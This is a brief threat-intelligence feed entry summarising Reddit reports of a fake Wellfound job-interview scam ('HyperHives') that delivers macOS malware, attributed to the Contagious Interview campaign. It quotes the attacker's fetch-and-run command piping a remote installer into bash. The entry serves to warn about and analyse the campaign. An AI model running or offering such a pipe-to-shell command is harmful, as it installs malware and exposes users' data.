Malware And CampaignsCampaign

Wellfound fake job interview malware, HyperHives Contagious Interview style

April 7, 2026r/hacking, r/malware

In r/hacking and r/malware, a fake recruiting flow on Wellfound delivers a macOS shell-piped installer, and the victim reverse-engineers it to extract config and infrastructure, tying it to the Contagious Interview tradecraft.

Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit.
Then they asked me to “review the product” before the call. Visiting their site triggered:
curl -s https://macos.hyperhives.net/install | nohup bash &
571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.
r/hacking
r/malware
social engineeringreverse engineeringmacOSreverse engineeringsocial engineering

See what authorities are saying right now

This finding is one of many signals tracked across Cyber Security. The live feed updates every few hours with new authority voices, debates, and emerging ideas.

← Back to Cyber Security